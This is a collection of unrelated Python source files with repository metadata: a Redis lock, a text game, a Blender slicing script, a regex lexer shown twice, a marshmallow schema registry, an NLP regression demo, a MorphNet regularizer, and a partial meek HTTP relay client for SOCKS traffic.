http://chris-lamb.co.uk/2010/06/07/distributing-locking-python-and-redis/
This code add's one change as suggested by the Redis documentation regarding
using locks in Redis, which is to only delete the Redis lock if we actually
completed within the timeout period. If we took too long to execute, then the
lock stored here is actually from a *different* client holding a lock and
we shouldn't be deleting their lock.
"""
# Copyright 2010,2011 Chris Lamb <lamby@debian.org>
import time
from retools import global_connection
class Lock(object):
def __init__(self, key, expires=60, timeout=10, redis=None):
"""
Distributed locking using Redis SETNX and GETSET.
Usage::
with Lock('my_lock'):
print "Critical section"
:param expires: We consider any existing lock older than
``expires`` seconds to be invalid in order to
detect crashed clients. This value must be higher
than it takes the critical section to execute.
:param timeout: If another client has already obtained the lock,
sleep for a maximum of ``timeout`` seconds before
giving up. A value of 0 means we never wait.
:param redis: The redis instance to use if the default global
redis connection is not desired.
"""
self.key = key
self.timeout = timeout
self.expires = expires
if not redis:
redis = global_connection.redis
self.redis = redis
self.start_time = time.time()
def __enter__(self):
redis = self.redis
timeout = self.timeout
while timeout >= 0:
expires = time.time() + self.expires + 1
if redis.setnx(self.key, expires):
# We gained the lock; enter critical section
self.start_time = time.time()
redis.expire(self.key, int(self.expires))
return
current_value = redis.get(self.key)
# We found an expired lock and nobody raced us to replacing it
if current_value and float(current_value) < time.time() and \
redis.getset(self.key, expires) == current_value:
self.start_time = time.time()
redis.expire(self.key, int(self.expires))
return
timeout -= 1
if timeout >= 0:
time.sleep(1)
raise LockTimeout("Timeout while waiting for lock")
def __exit__(self, exc_type, exc_value, traceback):
# Only delete the key if we completed within the lock expiration,
# otherwise, another lock might've been established
if time.time() - self.start_time < self.expires:
self.redis.delete(self.key)
class LockTimeout(BaseException):
"""Raised in the event a timeout occurs while waiting for a lock"""
| {
"repo_name": "mozilla-services/retools",
"path": "retools/lock.py",
"copies": "2",
"size": "3093",
"license": "mit",
"hash": -6077089054402341000,
"line_mean": 36.265060241,
"line_max": 77,
"alpha_frac": 0.6000646621,
"autogenerated": false,
"ratio": 4.541850220264317,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6141914882364317,
"avg_score": null,
"num_lines": null
} |
### Maybe I'll need this one day
class Player(object):
def __init__(self):
pass
### Quick, sleek and pointy teeth
class Alien(object):
def __init__(self,name):
self.name = name
self.health = 100
def bite(self, weapon):
fight(alien, marine, weapon)
### Large, lumbering and with guns
class Marine(object):
def __init__(self, name, rounds):
self.name = name
self.rounds = rounds
self.initRounds = rounds
self.weapon = ""
def fire(self, weapon):
marine.rounds -= 1
fight(marine, alien, weapon)
### Armory ##################################################
#weapons = {
# 'Pulse rifle' : ''
### Functions ###############################################
def checkForHit():
attackPoint = randint(1,9)
defendPoint = randint(1,9)
if attackPoint > defendPoint:
hit = True
else:
hit = False
return hit
def fight(attacker, defender, weapon):
hit = checkForHit()
if attacker == alien and hit:
print "Alien attacks with %s and hits!\n" % weapon,
elif attacker == alien and not hit:
print "Alien attacks with %s but misses!\n" % weapon,
elif attacker == marine and hit:
print "Marine fires %s and hits!\n" % weapon,
alien.health -= 50
elif attacker == marine and not hit:
print "Marine fires %s but misses!\n" % weapon,
else:
exit
print "Alien has %s health, marine har %s rounds left in gun.\n" % (alien.health,marine.rounds)
def chooseSides():
print "Which side do you want to play?"
print "1: Alien"
print "2: Marine"
side = raw_input("> ")
if side == "1":
print "Sorry, they're too sacry."
chooseSides()
elif side == "2":
return side
else:
print "What?"
chooseSides()
def chooseWeapon():
print "Which gun do you want to use?"
print "1: Pulse rifle - 50dmg, 75% chance to hit."
print "2: Grenade launcher - 100dmg, 50% chance to hit."
weapon = int(raw_input("> "))
if weapon == 1:
marine.weapon = "pulse rifle"
elif weapon == 2:
marine.weapon = "grenade launcher"
def ticker(ticks):
while ticks > 0:
print " "
ticks -= 1
sleep(2)
def playAgain():
playAgain = raw_input("\nPlay again? (y/n)")
if playAgain == "y":
runGame()
elif playAgain == "n":
print "Goodbye!"
else:
print "What?"
playAgain()
def runGame():
alien.health = 100
marine.rounds = marine.initRounds
side = chooseSides()
side = 1
if side == "1":
print "You're the Alien!"
elif side == "2":
print "You're the Marine!"
chooseWeapon()
else:
print "ERROR 1"
while marine.rounds > 0:
marine.fire(marine.weapon)
if alien.health <= 0:
print "\n### Marine wins!"
break
elif marine.rounds == 0:
alien.bite("claws")
print "\n### Alien wins!"
break
playAgain()
### Create the players
alien = Alien("Geoff")
marine = Marine("Steve",5)
### Go!
runGame()
| {
"repo_name": "andersekbom/pyliens",
"path": "main/pyliens_bu.py",
"copies": "1",
"size": "3410",
"license": "mit",
"hash": 8887073904065293000,
"line_mean": 21.8859060403,
"line_max": 99,
"alpha_frac": 0.5363636364,
"autogenerated": false,
"ratio": 3.5082304526748973,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45445940890748976,
"avg_score": null,
"num_lines": null
} |
# A reference and starting point for your own Sly scripts.
#
# Python nano-tutorial:
# * Anything after a # character on a line is a comment, so Python will
# ignore it.
# * Indentation matters. Make sure every line in a section is indented the
# same number of spaces.
# * Python is case-sensitive.
#
# Import statements. These load in any special functions you use in your
# script. Shouldn't have to change these.
from sly.slicer import SliceDef, to_slices
import sly.plotter
import sly.ops
import sly.bcontext
import bpy
import mathutils
# Path to the SVG file if you're exporting one.
# On OSX this would probably look like
# "/Users/myuser/Documents/blabla.svg"
# and on Windows something like
# "C:\Users\myuser\Documents\blabla.svg"
# Unix/Linux users shouldn't need any help with this :-)
SVG_OUTFILE = '/path/to/output.svg'
# How thick should the slice parts be? Ex. If you've scaled your
# model so that 1 unit=1 inch, and you measured your material
# to be 0.24 inches thick, enter 0.24 here.
THICKNESS = 0.5
# These variables are handy for specifying slice directions.
X_DIR = (1, 0, 0) # A plane with its face pointing in the X direction
Y_DIR = (0, 1, 0) # ... in the Y direction
Z_DIR = (0, 0, 1) # ... in the Z direction
# A SliceDef is how you define the slices that you want created.
# At a minimum, it must define the location of the slice plane.
# Plane locations are expressed in "co, no" form: A COordinate that
# lies on the plane, and the 3D NOrmal vector of the plane. Each of these
# are expressed as (X, Y, Z) vectors.
slice_defs = [
SliceDef((0, 0, 0), X_DIR), # The YZ plane
SliceDef((3, 0, 0), X_DIR), # The YZ plane moved 3 units in the X dir.
# Optional arguments for SliceDef:
#
# * name - A string to override the generated name for this slice.
# * z_index - Integer. Higher values will stack above slices with lower
# values. Useful for making sure that all slices in your
# construction are supported below by another slice (or the
# (ground).
SliceDef((0, -2, 0), Y_DIR, z_index=1),
SliceDef((0, 2, 0), Y_DIR, name="Front Part", z_index=1)
]
# Ask Blender for the mesh of whichever object you have selected in your
# scene. This needs to be executed in Object mode.
mesh = sly.bcontext.selected_bmesh()
# Hide the source object from view in Blender, so we can see the slices.
bpy.context.object.hide = True
# Where the magic happens. Sly returns a list of Slices from three required
# arguments: the mesh to slice up, the list of SliceDefs, and the thickness
# of the slices, in Blender units.
slices = to_slices(mesh, slice_defs, THICKNESS)
# to_slices has an additional optional argument:
#
# fillet_radius - Set to a positive number if you want the cutouts in your
# slice to have dogbone fillets. If you're cutting out your design on a CNC
# router, set this to the radius (half diameter) of the bit you're using. It
# will make the slices fit together better since the bit will be able to cut
# closer to the ideal square bottom.
#
# slices = to_slices(mesh, slice_defs, THICKNESS, fillet_radius=0.0625)
# Create a page to draw our 2D slice shapes onto. The numbers are the width
# and height of the output SVG, but we don't do any automatic placement. So
# you'll still probably want to use a program like Illustrator or Inkscape
# to position the slices.
page = sly.plotter.Page(10, 10)
# Do this stuff for each slice that was created by to_slices
for sli in slices:
# Add the slice to the page we created above (for SVG output)
page.add_slice(sli)
# Apply the "border" operation to the slice. Cuts out the centers of the
# slice and leaves a border of the specified thickness. Good for a
# more lightweight-looking end result. We're making our border 2x the
# thickness of our material; that should produce a nice effect without
# weakening the construction too much.
sly.ops.border(sli, THICKNESS * 2)
# Finally, add the slice to the Blender scene as a new object. The object
# will include the 'name' attribute you specified in the
# SliceDef.
sly.bcontext.add_slice(sli)
# Uncomment the next line if you want to export an SVG file as well.
# Make sure you specified a valid file path above!
# sly.plotter.SVGEncoder.encode(page, SVG_OUTFILE)
| {
"repo_name": "meshulam/sly",
"path": "example/starter.py",
"copies": "1",
"size": "4408",
"license": "mit",
"hash": 4179153313929770000,
"line_mean": 39.0727272727,
"line_max": 79,
"alpha_frac": 0.7046279492,
"autogenerated": false,
"ratio": 3.479084451460142,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4683712400660142,
"avg_score": null,
"num_lines": null
} |
# A regex-based Lexer/tokenizer.
# See the if __main__ section in the bottom for an example.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
import re
import sys
class Token(object):
""" A simple Token structure.
Contains the token type, value and position.
"""
def __init__(self, type, val, pos):
self.type = type
self.val = val
self.pos = pos
def __str__(self):
return '%s(%s) at %s' % (self.type, self.val, self.pos)
class LexerError(Exception):
""" Lexer error exception.
pos:
Position in the input line where the error occurred.
"""
def __init__(self, pos):
self.pos = pos
class Lexer(object):
""" A simple regex-based lexer/tokenizer.
See below for an example of usage.
"""
def __init__(self, rules, skip_whitespace=True):
""" Create a lexer.
rules:
A list of rules. Each rule is a `regex, type`
pair, where `regex` is the regular expression used
to recognize the token and `type` is the type
of the token to return when it's recognized.
skip_whitespace:
If True, whitespace (\s+) will be skipped and not
reported by the lexer. Otherwise, you have to
specify your rules for whitespace, or it will be
flagged as an error.
"""
# All the regexes are concatenated into a single one
# with named groups. Since the group names must be valid
# Python identifiers, but the token types used by the
# user are arbitrary strings, we auto-generate the group
# names and map them to token types.
#
idx = 1
regex_parts = []
self.group_type = {}
for regex, type in rules:
groupname = 'GROUP%s' % idx
regex_parts.append('(?P<%s>%s)' % (groupname, regex))
self.group_type[groupname] = type
idx += 1
self.regex = re.compile('|'.join(regex_parts))
self.skip_whitespace = skip_whitespace
self.re_ws_skip = re.compile('\S')
def input(self, buf):
""" Initialize the lexer with a buffer as input.
"""
self.buf = buf
self.pos = 0
def token(self):
""" Return the next token (a Token object) found in the
input buffer. None is returned if the end of the
buffer was reached.
In case of a lexing error (the current chunk of the
buffer matches no rule), a LexerError is raised with
the position of the error.
"""
if self.pos >= len(self.buf):
return None
else:
if self.skip_whitespace:
m = self.re_ws_skip.search(self.buf[self.pos:])
if m:
self.pos += m.start()
else:
return None
m = self.regex.match(self.buf[self.pos:])
if m:
groupname = m.lastgroup
tok_type = self.group_type[groupname]
tok = Token(tok_type, m.group(groupname), self.pos)
self.pos += m.end()
return tok
# if we're here, no rule matched
raise LexerError(self.pos)
def tokens(self):
""" Returns an iterator to the tokens found in the buffer.
"""
while 1:
tok = self.token()
if tok is None: break
yield tok
if __name__ == '__main__':
rules = [
('\d+', 'NUMBER'),
('[a-zA-Z_]\w+', 'IDENTIFIER'),
('\+', 'PLUS'),
('\-', 'MINUS'),
('\*', 'MULTIPLY'),
('\/', 'DIVIDE'),
('\(', 'LP'),
('\)', 'RP'),
('=', 'EQUALS'),
]
lx = Lexer(rules, skip_whitespace=True)
lx.input('erw = _abc + 12*(R4-623902) ')
try:
for tok in lx.tokens():
print tok
except LexerError, err:
print 'LexerError at position', err.pos
| {
"repo_name": "evandrix/Splat",
"path": "doc/parser/lexer.py",
"copies": "1",
"size": "4457",
"license": "mit",
"hash": -949195472658355300,
"line_mean": 30.1678321678,
"line_max": 67,
"alpha_frac": 0.4808166928,
"autogenerated": false,
"ratio": 4.417244796828543,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00921712729456675,
"num_lines": 143
} |
# A regex-based Lexer/tokenizer.
# See the if __main__ section in the bottom for an example.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
import re
import sys
class Token(object):
""" A simple Token structure.
Contains the token type, value and position.
"""
def __init__(self, type, val, pos):
self.type = type
self.val = val
self.pos = pos
def __str__(self):
return '%s(%s) at %s' % (self.type, self.val, self.pos)
class LexerError(Exception):
""" Lexer error exception.
pos:
Position in the input line where the error occurred.
"""
def __init__(self, pos):
self.pos = pos
class Lexer(object):
""" A simple regex-based lexer/tokenizer.
See below for an example of usage.
"""
def __init__(self, rules, skip_whitespace=True):
""" Create a lexer.
rules:
A list of rules. Each rule is a `regex, type`
pair, where `regex` is the regular expression used
to recognize the token and `type` is the type
of the token to return when it's recognized.
skip_whitespace:
If True, whitespace (\s+) will be skipped and not
reported by the lexer. Otherwise, you have to
specify your rules for whitespace, or it will be
flagged as an error.
"""
# All the regexes are concatenated into a single one
# with named groups. Since the group names must be valid
# Python identifiers, but the token types used by the
# user are arbitrary strings, we auto-generate the group
# names and map them to token types.
#
idx = 1
regex_parts = []
self.group_type = {}
for regex, type in rules:
groupname = 'GROUP%s' % idx
regex_parts.append('(?P<%s>%s)' % (groupname, regex))
self.group_type[groupname] = type
idx += 1
self.regex = re.compile('|'.join(regex_parts))
self.skip_whitespace = skip_whitespace
self.re_ws_skip = re.compile('\S')
def input(self, buf):
""" Initialize the lexer with a buffer as input.
"""
self.buf = buf
self.pos = 0
def token(self):
""" Return the next token (a Token object) found in the
input buffer. None is returned if the end of the
buffer was reached.
In case of a lexing error (the current chunk of the
buffer matches no rule), a LexerError is raised with
the position of the error.
"""
if self.pos >= len(self.buf):
return None
else:
if self.skip_whitespace:
m = self.re_ws_skip.search(self.buf[self.pos:])
if m:
self.pos += m.start()
else:
return None
m = self.regex.match(self.buf[self.pos:])
if m:
groupname = m.lastgroup
tok_type = self.group_type[groupname]
tok = Token(tok_type, m.group(groupname), self.pos)
self.pos += m.end()
return tok
# if we're here, no rule matched
raise LexerError(self.pos)
def tokens(self):
""" Returns an iterator to the tokens found in the buffer.
"""
while 1:
tok = self.token()
if tok is None: break
yield tok
if __name__ == '__main__':
rules = [
('\d+', 'NUMBER'),
('[a-zA-Z_]\w+', 'IDENTIFIER'),
('\+', 'PLUS'),
('\-', 'MINUS'),
('\*', 'MULTIPLY'),
('\/', 'DIVIDE'),
('\(', 'LP'),
('\)', 'RP'),
('=', 'EQUALS'),
]
lx = Lexer(rules, skip_whitespace=True)
lx.input('erw = _abc + 12*(R4-623902) ')
try:
for tok in lx.tokens():
print tok
except LexerError, err:
print 'LexerError at position', err.pos
| {
"repo_name": "AnthonyCAS/code-for-blog",
"path": "2009/py_rd_parser_example/lexer.py",
"copies": "14",
"size": "4583",
"license": "unlicense",
"hash": 8506505814438647000,
"line_mean": 30.1678321678,
"line_max": 67,
"alpha_frac": 0.4675976435,
"autogenerated": false,
"ratio": 4.4538386783284745,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.016948619993451937,
"num_lines": 143
} |
"""A registry of :class:`Schema <marshmallow.Schema>` classes. This allows for string
lookup of schemas, which may be used with
class:`fields.Nested <marshmallow.fields.Nested>`.
.. warning::
This module is treated as private API.
Users should not need to use this module directly.
"""
import typing
from marshmallow.exceptions import RegistryError
if typing.TYPE_CHECKING:
from marshmallow import Schema
SchemaType = typing.Type[Schema]
# {
# <class_name>: <list of class objects>
# <module_path_to_class>: <list of class objects>
# }
_registry = {} # type: typing.Dict[str, typing.List["SchemaType"]]
def register(classname: str, cls: "SchemaType") -> None:
"""Add a class to the registry of serializer classes. When a class is
registered, an entry for both its classname and its full, module-qualified
path are added to the registry.
Example: ::
class MyClass:
pass
register('MyClass', MyClass)
# Registry:
# {
# 'MyClass': [path.to.MyClass],
# 'path.to.MyClass': [path.to.MyClass],
# }
"""
# Module where the class is located
module = cls.__module__
# Full module path to the class
# e.g. user.schemas.UserSchema
fullpath = ".".join([module, classname])
# If the class is already registered; need to check if the entries are
# in the same module as cls to avoid having multiple instances of the same
# class in the registry
if classname in _registry and not any(
each.__module__ == module for each in _registry[classname]
):
_registry[classname].append(cls)
elif classname not in _registry:
_registry[classname] = [cls]
# Also register the full path
if fullpath not in _registry:
_registry.setdefault(fullpath, []).append(cls)
else:
# If fullpath does exist, replace existing entry
_registry[fullpath] = [cls]
return None
def get_class(
classname: str, all: bool = False
) -> typing.Union[typing.List["SchemaType"], "SchemaType"]:
"""Retrieve a class from the registry.
:raises: marshmallow.exceptions.RegistryError if the class cannot be found
or if there are multiple entries for the given class name.
"""
try:
classes = _registry[classname]
except KeyError as error:
raise RegistryError(
"Class with name {!r} was not found. You may need "
"to import the class.".format(classname)
) from error
if len(classes) > 1:
if all:
return _registry[classname]
raise RegistryError(
"Multiple classes with name {!r} "
"were found. Please use the full, "
"module-qualified path.".format(classname)
)
else:
return _registry[classname][0]
| {
"repo_name": "marshmallow-code/marshmallow",
"path": "src/marshmallow/class_registry.py",
"copies": "1",
"size": "2836",
"license": "mit",
"hash": -6978642883984595000,
"line_mean": 30.1648351648,
"line_max": 85,
"alpha_frac": 0.6357545839,
"autogenerated": false,
"ratio": 4.074712643678161,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521046722757816,
"avg_score": null,
"num_lines": null
} |
# A Regression Digression
##########################
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer
from nltk.tokenize.casual import casual_tokenize
from nlpia.data.loaders import get_data
sms = get_data('sms-spam')
tfidf = TfidfVectorizer(tokenizer=casual_tokenize)
tfidf_docs = tfidf.fit_transform(raw_documents=sms.text).toarray()
tfidf_docs = pd.DataFrame(tfidf_docs, columns=list(zip(*sorted([(v, k) for (k, v) in tfidf.vocabulary_.items()])))[1])
##########################
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
# TFIDF->LDA
tfidf_lda = LDA(n_components=1)
tfidf_lda.fit(tfidf_docs, sms.spam)
# Most spammy terms (words) in the TFIDF:
tfidf_lda_coef = pd.DataFrame(list(zip(tfidf_lda.coef_[0, :], tfidf_docs.columns)), columns='coef term'.split())
print(tfidf_lda_coef.sort_values('coef', ascending=False).head())
# coef term
# 2666 7.606693e+06 darling
# 7168 5.393772e+06 sexychat
# 895 5.202198e+06 80488
# 6085 4.865422e+06 parties
# 9025 4.852177e+06 www.07781482378.com
##########################
from sklearn.decomposition import PCA
# TFIDF->PCA->LDA
pca = PCA(n_components=256)
pca = pca.fit(tfidf_docs)
pca_topic_vectors = pca.transform(tfidf_docs)
pca_topic_vectors = pd.DataFrame(pca_topic_vectors, columns=['topic{}'.format(i) for i in range(pca.n_components_)])
pca_components = pd.DataFrame(pca.components_,
columns=tfidf_docs.columns,
index=['topic{}'.format(i) for i in range(pca.n_components_)])
##########################
pca_lda = LDA(n_components=1)
pca_lda.fit(pca_topic_vectors, sms.spam)
sms['pca_lda_spam_prob'] = pca_lda.predict_proba(pca_topic_vectors)[:, 1]
##########################
pca_topic_vectors['spam_label_'] = sms.spam
print(pca_topic_vectors.corr().spam_label_.sort_values(ascending=False).head())
# spam_label_ 1.000000
# topic4 0.564850
# topic2 0.275897
# topic10 0.186002
# topic9 0.167077
##########################
sms['topic4'] = pca_topic_vectors.topic4
##########################
from nltk.sentiment import SentimentIntensityAnalyzer
vader = SentimentIntensityAnalyzer()
scores = pd.DataFrame([vader.polarity_scores(text) for text in sms.text])
sms['vader'] = scores['compound']
sms.describe().tail()
# spam pca_lda_spam_prob vader
# min 0.0 5.845537e-15 -0.9042
# 25% 0.0 2.155922e-09 0.0000
# 50% 0.0 2.822494e-08 0.0000
# 75% 0.0 1.172246e-06 0.5267
# max 1.0 1.000000e+00 1.0000
##########################
mask = (sms.vader > 0.1) | (sms.vader < -0.1)
sms = sms[mask].copy()
##########################
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
for col in ['pca_lda_spam_prob', 'vader', 'topic4']:
sms.loc[:, col] = scaler.fit_transform(sms[[col]])
##########################
from nlpia.models import LinearRegressor
line = LinearRegressor()
line = line.fit(sms['topic4'], sms['vader'])
print('{:.4f}'.format(line.slope))
# 0.29
sms['line'] = line.predict(sms['topic4'])
##########################
from sklearn.linear_model import SGDRegressor
sgd = SGDRegressor(n_iter=20000)
sgd = sgd.fit(sms[['topic4']], sms['vader'])
print('{:.4f}'.format(sgd.coef_[0]))
# 0.2930
sms['sgd'] = sgd.predict(sms[['topic4']])
##########################
from nlpia.models import OneNeuronRegressor
nn = OneNeuronRegressor(alpha=100, n_iter=200)
nn = nn.fit(sms[['topic4']], sms['vader'])
print(nn.W[0, 1])
# 0.29386408
sms['neuron'] = nn.predict(sms[['topic4']])
##########################
from matplotlib import pyplot as plt
import matplotlib
# matplotlib.use('TkAgg')
import seaborn
def sentiment_scatter(sms=sms):
sms = sms.sort_values('topic4').sample(200)
plt.figure(figsize=(10, 7.5))
ax = plt.subplot(1, 1, 1)
ax = sms.plot.scatter(x='topic4', y='line', ax=ax, color='g', marker='+', s=400, lw=3, alpha=.5)
ax = sms.plot.scatter(x='topic4', y='sgd', ax=ax, color='r', marker='x', s=200, lw=3, alpha=.5)
ax = sms.plot.scatter(x='topic4', y='vader', ax=ax, color='k', marker='s', s=100, alpha=.5)
ax = sms.plot.scatter(x='topic4', y='neuron', ax=ax, color='c', marker='.', s=100, alpha=.5)
ax = sms.plot.scatter(x='topic4', y='pca_lda_spam_prob', ax=ax, marker='o', s=150, color='b', alpha=.5)
plt.ylabel('Sentiment')
plt.xlabel('Topic 4')
plt.legend(['LinearRegressor', 'SGDRegressor', 'VADER', 'OneNeuronRegresor', 'PCA->LDA->spaminess'])
plt.tight_layout()
plt.grid()
plt.show()
sentiment_scatter()
| {
"repo_name": "totalgood/nlpia",
"path": "src/nlpia/book/examples/ch05_regression_digression.py",
"copies": "1",
"size": "4707",
"license": "mit",
"hash": 5703010722630734000,
"line_mean": 27.8773006135,
"line_max": 118,
"alpha_frac": 0.6061185468,
"autogenerated": false,
"ratio": 2.8475499092558985,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3953668456055899,
"avg_score": null,
"num_lines": null
} |
"""A regularizer based on group-lasso.
All the weights that are related to a single output are grouped into one LASSO
group (https://arxiv.org/pdf/1611.06321.pdf).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from morph_net.framework import generic_regularizers
from morph_net.framework import tpu_util
import tensorflow.compat.v1 as tf
class GroupLassoRegularizer(generic_regularizers.OpRegularizer):
"""A regularizer for convolutions and matmul operations, based on group-lasso.
Supported ops: Conv2D, Conv2DBackpropInput (transposed Conv2D), and MatMul
are supported. The grouping is done according to the formula:
(1 - l1_fraction) * L2(weights) / sqrt(dim) + l1_fraction * L1(weights) / dim,
where `dim` is the number of weights associated with an activation, L2 and L1
are the respective norms, and l1_fraction controls the balance between L1 and
L2 grouping. The paper cited above experiments with 0.0 and 0.5 for
l1_fraction.
"""
def __init__(self, weight_tensor, reduce_dims, threshold, l1_fraction=0.0):
"""Creates an instance.
Args:
weight_tensor: A tensor with the weights of the op (potentially sliced).
reduce_dims: A tuple indictaing the dimensions of `weight_tensor`
to reduce over. Most often it will include all dimensions except
the output size.
threshold: A float. When the norm of the group associated with an
activation is below the threshold, it will be considered dead.
l1_fraction: A float, controls the balance between L1 and L2 grouping (see
above).
"""
weight_tensor = tpu_util.maybe_convert_to_variable(weight_tensor)
if l1_fraction < 0.0 or l1_fraction > 1.0:
raise ValueError(
'l1_fraction should be in [0.0, 1.0], not %e.' % l1_fraction)
self._threshold = threshold
l2_norm = tf.sqrt(
tf.reduce_mean(tf.square(weight_tensor), axis=reduce_dims))
if l1_fraction > 0.0:
l1_norm = tf.reduce_mean(tf.abs(weight_tensor), axis=reduce_dims)
norm = l1_fraction * l1_norm + (1.0 - l1_fraction) * l2_norm
else:
norm = l2_norm
self._regularization_vector = norm
self._alive_vector = norm > threshold
@property
def regularization_vector(self):
return self._regularization_vector
@property
def alive_vector(self):
return self._alive_vector
| {
"repo_name": "google-research/morph-net",
"path": "morph_net/op_regularizers/group_lasso_regularizer.py",
"copies": "1",
"size": "2417",
"license": "apache-2.0",
"hash": -1420001296472025000,
"line_mean": 36.1846153846,
"line_max": 80,
"alpha_frac": 0.704178734,
"autogenerated": false,
"ratio": 3.6074626865671644,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4811641420567164,
"avg_score": null,
"num_lines": null
} |
# a relay forward local socks to a remote socks through meek (i.e., HTTP transport).
import logging
import uuid
import random
import ssl
from collections import defaultdict
import gevent
from gevent import select
from gevent import socket
from gevent.queue import Queue, LifoQueue
from gevent.event import Event
from geventhttpclient import HTTPClient, URL
from gsocks.relay import RelayFactory, RelaySession, RelaySessionError
from gsocks.msg import Reply, GENERAL_SOCKS_SERVER_FAILURE
from gsocks.utils import SharedTimer, bind_local_udp, request_fail, request_success, \
sock_addr_info
from constants import SESSION_ID_LENGTH, MAX_PAYLOAD_LENGTH, HEADER_SESSION_ID, \
HEADER_UDP_PKTS, HEADER_MODE, HEADER_MSGTYPE, MSGTYPE_DATA, MODE_STREAM, \
HEADER_ERROR, CLIENT_MAX_TRIES, CLIENT_RETRY_DELAY, CLIENT_INITIAL_POLL_INTERVAL, \
CLIENT_POLL_INTERVAL_MULTIPLIER, CLIENT_MAX_POLL_INTERVAL, MSGTYPE_TERMINATE, \
CLIENT_MAX_FAILURE
log = logging.getLogger(__name__)
def session_id():
return str(uuid.uuid4())[:SESSION_ID_LENGTH]
def get_meek_meta(headers, key, default=""):
# requests lib gives lower-string headers
return dict(headers).get(key.lower(), default)
class Relay:
def __init__(self, fronturl="", hostname="", properties="", failure=0):
self.fronturl = fronturl
self.hostname = hostname
self.properties = properties
self.failure = failure
class HTTPClientPool:
def __init__(self):
self.pool = defaultdict(LifoQueue)
def get(self, relay, ca_certs, timeout):
try:
return self.pool[relay.fronturl].get(block=False)
except gevent.queue.Empty:
insecure = "verify" not in relay.properties
if ca_certs:
ssl_options = {'ca_certs': ca_certs, 'ssl_version': ssl.PROTOCOL_TLSv1}
else:
ssl_options = {'ssl_version': ssl.PROTOCOL_TLSv1}
conn = HTTPClient.from_url(
URL(relay.fronturl),
insecure=insecure,
block_size=MAX_PAYLOAD_LENGTH,
connection_timeout=timeout,
network_timeout=timeout,
concurrency=1,
ssl_options=ssl_options
)
return conn
def release(self, relay, conn):
self.pool[relay.fronturl].put(conn)
class MeekSession(RelaySession):
conn_pool = HTTPClientPool()
def __init__(self, socksconn, meek, timeout):
super(MeekSession, self).__init__(socksconn)
self.sessionid = session_id()
self.meek = meek
self.meektimeout = timeout
self.relay = self.meek.select_relay()
self.ca_certs = self.meek.ca_certs
self.httpclient = self.conn_pool.get(self.relay, self.ca_certs, self.meektimeout)
self.udpsock = None
self.allsocks = [self.socksconn]
self.l2m_queue = Queue()
self.m2l_queue = Queue()
self.m_notifier = Event()
self.l_notifier = Event()
self.finish = Event()
self.m_notifier.clear()
self.l_notifier.clear()
self.finish.clear()
self.timer = SharedTimer(self.meektimeout)
def _stream_response(self, response):
try:
chunk = response.read(MAX_PAYLOAD_LENGTH)
while chunk:
log.debug("%s streaming DOWN %d bytes" % (self.sessionid, len(chunk)))
yield chunk, ""
chunk = response.read(MAX_PAYLOAD_LENGTH)
except GeneratorExit:
response.release()
raise StopIteration
def meek_response(self, response, stream):
if stream:
return self._stream_response(response)
data = response.read()
response.release()
if not data:
return [("", "")]
if not self.udpsock:
return [(data, "")]
# parse UDP packets
log.debug("%s DOWN %d bytes" % (self.sessionid, len(data)))
lengths = get_meek_meta(response.headers, HEADER_UDP_PKTS).split(",")
pos = 0
pkts = []
for length in lengths:
nxt = pos + int(length)
pkts.append((data[pos:nxt], ""))
pos = nxt
return pkts
def meek_roundtrip(self, pkts):
headers = {
HEADER_SESSION_ID: self.sessionid,
HEADER_MSGTYPE: MSGTYPE_DATA,
'Host': self.relay.hostname,
'Content-Type': "application/octet-stream",
'Connection': "Keep-Alive",
}
stream = False
if not self.udpsock and "stream" in self.relay.properties:
stream = True
headers[HEADER_MODE] = MODE_STREAM
if pkts and self.udpsock:
lengths = str(",".join([str(len(p)) for p in pkts]))
headers[HEADER_UDP_PKTS] = lengths
data = "".join(pkts)
headers['Content-Length'] = str(len(data))
for _ in range(CLIENT_MAX_TRIES):
try:
log.debug("%s UP %d bytes" % (self.sessionid, len(data)))
resp = self.httpclient.post("/", body=data, headers=headers)
if resp.status_code != 200:
# meek server always give 200, so all non-200s mean external issues.
continue
err = get_meek_meta(resp.headers, HEADER_ERROR)
if err:
return [("", err)]
else:
try:
return self.meek_response(resp, stream)
except Exception as ex:
log.error("[Exception][meek_roundtrip - meek_response]: %s" % str(ex))
resp.release()
return [("", "Data Format Error")]
except socket.timeout: # @UndefinedVariable
return [("", "timeout")]
except Exception as ex:
log.error("[Exception][meek_roundtrip]: %s" % str(ex))
gevent.sleep(CLIENT_RETRY_DELAY)
self.relay.failure += 1
return [("", "Max Retry (%d) Exceeded" % CLIENT_MAX_TRIES)]
def meek_sendrecv(self):
pkts = []
datalen = 0
while not self.l2m_queue.empty():
pkt = self.l2m_queue.get()
pkts.append(pkt)
datalen += len(pkt)
if datalen >= MAX_PAYLOAD_LENGTH:
for (resp, err) in self.meek_roundtrip(pkts):
yield (resp, err)
if err or not resp:
return
pkts = []
datalen = 0
for (resp, err) in self.meek_roundtrip(pkts):
yield (resp, err)
if err or not resp:
return
def meek_relay(self):
for (resp, err) in self.meek_sendrecv():
if err:
return err
if resp:
self.m2l_queue.put(resp)
self.l_notifier.set()
return ""
def meek_relay_thread(self):
interval = CLIENT_INITIAL_POLL_INTERVAL
while not self.finish.is_set():
try:
hasdata = self.m_notifier.wait(timeout=interval)
self.m_notifier.clear()
err = self.meek_relay()
if err:
break
if not hasdata:
interval *= CLIENT_POLL_INTERVAL_MULTIPLIER
if interval > CLIENT_MAX_POLL_INTERVAL:
